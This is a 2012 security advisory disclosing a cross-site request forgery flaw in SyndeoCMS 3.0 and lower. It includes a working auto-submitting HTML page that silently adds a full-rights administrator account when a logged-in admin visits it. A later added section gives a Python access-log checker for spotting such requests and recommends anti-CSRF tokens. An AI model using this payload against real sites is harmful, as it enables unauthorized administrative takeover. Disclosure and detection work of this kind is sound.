SyndeoCMS 3.0 Cross Site Request Forgery

2012.02.21
Credit: Ivano Binetti
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : SyndeoCMS <= 3.0 CSRF Vulnerability
# Date          : 19-02-2012
# Author        : Ivano Binetti (http://ivanobinetti.com)
# Vendor site   : http://www.syndeocms.org/
# Software link : http://sourceforge.net/projects/syndeocms
# Version       : 3.0 and lower
# Tested on     : Debian Squeeze (6.0)
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Add Admin Account by Ivano Binetti]--------------------------------------------------+

Summary

1)Introduction
2)Description
3)Exploit
+---------------------------------------------------------------------------------------------------------------------------------+

1)Introduction
The aim of this brief document is to describe a new CSRF vulnerability found in SyndeoCMS 3.0 and lower versions, and the related exploit.

2)Description
This vulnerability allows an attacker to add an administrator account to SyndeoCMS 3.0 (and lower) when an authenticated admin browses a web page containing the following HTML/JavaScript code.

3)Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>I'm adding ADMIN account</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/syndeocms/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id=">
<input type="hidden" name="fullname" value="new_admin"/>
<input type="hidden" name="username" value="new_admin"/>
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="email" value="admin@admin.com"/>
<input type="hidden" name="editor" value="2"/>
<input type="hidden" name="sections" value=""/>
<input type="hidden" name="access_1" value="1"/>
<input type="hidden" name="access_2" value="1"/>
<input type="hidden" name="access_13" value="1"/>
<input type="hidden" name="access_3" value="1"/>
<input type="hidden" name="access_4" value="1"/>
<input type="hidden" name="access_5" value="1"/>
<input type="hidden" name="access_6" value="1"/>
<input type="hidden" name="access_7" value="1"/>
<input type="hidden" name="access_8" value="1"/>
<input type="hidden" name="access_9" value="1"/>
<input type="hidden" name="access_16" value="1"/>
<input type="hidden" name="access_10" value="1"/>
<input type="hidden" name="access_11" value="1"/>
<input type="hidden" name="access_12" value="1"/>
<input type="hidden" name="access_14" value="1"/>
<input type="hidden" name="access_15" value="1"/>
<input type="hidden" name="m_access%5B6%5D" value="1"/>
<input type="hidden" name="m_access%5B8%5D" value="1"/>
<input type="hidden" name="m_access%5B10%5D" value="1"/>
<input type="hidden" name="m_access%5B11%5D" value="1"/>
<input type="hidden" name="m_access%5B0%5D" value="1"/>
<input type="hidden" name="m_access%5B1%5D" value="1"/>
<input type="hidden" name="m_access%5B13%5D" value="1"/>
<input type="hidden" name="m_access%5B12%5D" value="1"/>
<input type="hidden" name="m_access%5B14%5D" value="1"/>
<input type="hidden" name="m_access%5B15%5D" value="1"/>
<input type="hidden" name="m_access%5B7%5D" value="1"/>
<input type="hidden" name="m_access%5B19%5D" value="1"/>
<input type="hidden" name="m_access%5B2%5D" value="1"/>
<input type="hidden" name="m_access%5B16%5D" value="1"/>
<input type="hidden" name="m_access%5B17%5D" value="1"/>
<input type="hidden" name="m_access%5B18%5D" value="1"/>
<input type="hidden" name="m_access%5B3%5D" value="1"/>
<input type="hidden" name="m_access%5B4%5D" value="1"/>
<input type="hidden" name="m_access%5B9%5D" value="1"/>
<input type="hidden" name="m_access%5B5%5D" value="1"/>
</form>
</body>
</html>
+----------------------------------------------------------------------------------------------------------------------------------+
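
Added example (not part of the original advisory and not SyndeoCMS code): a log check a defender could run to find the request described above, that is, POSTs to the save_user action whose Referer is missing or points at another site. It assumes Combined Log Format access logs; the host cms.example.test, the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# Query parameters of the user-save action, copied from the form action in the advisory.
SAVE_USER = {"option": "configuration", "suboption": "users", "modoption": "save_user"}

def is_save_user(target):
    """True if the request target addresses the save_user action."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return all(qs.get(k, [None])[-1] == v for k, v in SAVE_USER.items())

def ref_host(ref):
    """Hostname of a Referer value, or '' if it cannot be parsed."""
    try:
        return urlsplit(ref).hostname or ""
    except ValueError:
        return ""

def suspicious_saves(lines, site_hosts):
    """Return (timestamp, ip, reason) for save_user POSTs not referred from the CMS itself."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST" or not is_save_user(m["target"]):
            continue
        ref = m["referer"]
        if ref in ("", "-"):
            reason = "no Referer"
        elif ref_host(ref) in site_hosts:
            continue  # form was submitted from the CMS's own pages
        else:
            reason = "cross-site Referer: " + (ref_host(ref) or "unparseable")
        hits.append((m["ts"], m["ip"], reason))
    return hits

# Constructed sample lines (not real traffic); cms.example.test is a placeholder host.
SAMPLE = [
    '198.51.100.4 - - [19/Feb/2012:09:58:40 +0100] "POST /syndeocms/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id=3 HTTP/1.1" 200 5120 "http://cms.example.test/syndeocms/starnet/index.php?option=configuration&suboption=users" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Feb/2012:10:02:11 +0100] "POST /syndeocms/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id= HTTP/1.1" 200 5120 "http://other.example.net/page.html" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Feb/2012:10:05:30 +0100] "POST /syndeocms/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [19/Feb/2012:10:06:00 +0100] "GET /syndeocms/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_saves(SAMPLE, {"cms.example.test"}):
        print(hit)
```

A missing Referer also occurs with strict referrer policies or privacy tooling, so treat hits as leads to compare against known admin activity and the CMS user table. The underlying fix for CWE-352 is a per-session anti-CSRF token verified on every state-changing request.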

References:

http://ivanobinetti.com

